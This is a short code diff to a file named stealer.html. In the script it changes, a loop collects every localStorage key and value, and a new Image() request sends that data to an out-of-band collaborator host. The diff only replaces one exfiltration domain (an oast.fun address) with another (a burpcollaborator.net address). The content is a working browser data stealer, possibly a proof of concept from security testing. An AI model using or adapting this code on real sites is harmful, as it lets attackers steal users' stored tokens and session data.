--- a/stealer.html
+++ b/stealer.html
@@ -10,7 +10,7 @@
             data += key + '=' + localStorage.getItem(key) + '&';
           }
         }
-        new Image().src = "https://bvgdjvgbjendwujiktpc7z59xxjaoau8x.oast.fun/?" + encodeURIComponent(data);
+        new Image().src = "https://zhkpj3ywa31n5ocuyrt0v0ti096zuo.burpcollaborator.net/?" + encodeURIComponent(data);
       ]]>
     </script>
   </body>
